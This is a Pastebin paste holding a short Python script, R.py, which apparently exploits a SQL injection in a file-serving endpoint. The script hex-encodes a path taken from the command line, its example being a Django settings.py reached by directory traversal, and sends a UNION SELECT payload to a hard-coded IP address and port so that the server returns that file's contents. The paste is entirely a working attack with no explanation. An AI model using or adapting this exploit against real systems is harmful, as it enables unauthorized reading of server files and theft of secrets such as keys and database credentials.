Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- R.py
- import requests
- import binascii
- import sys# python r.py "../FileShack/settings.py"
- p = binascii.hexlify(sys.argv[1])
- r = requests.get('http://104.250.105.109:19080/file/AAAAAAAA" union select 1,2,0x{} -- -'.format(p))
- print r.content
Advertisement
Add Comment
Please, Sign In to add comment